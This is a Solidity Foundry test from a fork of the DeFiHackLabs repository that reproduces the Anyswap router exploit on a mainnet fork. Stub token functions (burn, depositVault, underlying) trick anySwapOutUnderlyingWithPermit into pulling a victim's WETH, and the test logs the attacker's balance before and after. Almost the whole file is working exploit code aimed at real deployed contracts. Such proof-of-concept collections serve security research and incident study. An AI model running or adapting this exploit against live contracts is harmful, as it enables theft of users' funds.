forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Anyswap_poc.t.sol
63 lines (56 loc) · 2.07 KB
/
Anyswap_poc.t.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
contract ContractTest is Test {
address WETH_Address = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
AnyswapV4Router any = AnyswapV4Router(0x6b7a87899490EcE95443e979cA9485CBE7E71522);
AnyswapV1ERC20 any20 = AnyswapV1ERC20(0x6b7a87899490EcE95443e979cA9485CBE7E71522);
WETH weth = WETH(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
function setUp() public {
cheats.createSelectFork("mainnet", 14_037_236); // fork mainnet block number 14037236
}
function testExample() public {
//https://etherscan.io/tx/0xe50ed602bd916fc304d53c4fed236698b71691a95774ff0aeeb74b699c6227f7
// anySwapOutUnderlyingWithPermit(
// address from,
// address token,
// address to,
// uint amount,
// uint deadline,
// uint8 v,
// bytes32 r,
// bytes32 s,
// uint toChainID
// )
any.anySwapOutUnderlyingWithPermit(
0x3Ee505bA316879d246a8fD2b3d7eE63b51B44FAB,
address(this),
msg.sender,
308_636_644_758_370_382_903,
100_000_000_000_000_000_000,
0,
"0x",
"0x",
56
);
emit log_named_uint("Before exploit, WETH balance of attacker:", weth.balanceOf(msg.sender));
weth.transfer(msg.sender, 308_636_644_758_370_382_901);
//uint sender = weth.balanceOf(msg.sender);
emit log_named_uint("After exploit, WETH balance of attacker:", weth.balanceOf(msg.sender));
}
function burn(address from, uint256 amount) external returns (bool) {
amount;
from;
return true;
}
function depositVault(uint256 amount, address to) external returns (uint256) {
amount;
to;
return 1;
}
function underlying() external view returns (address) {
return WETH_Address;
}
}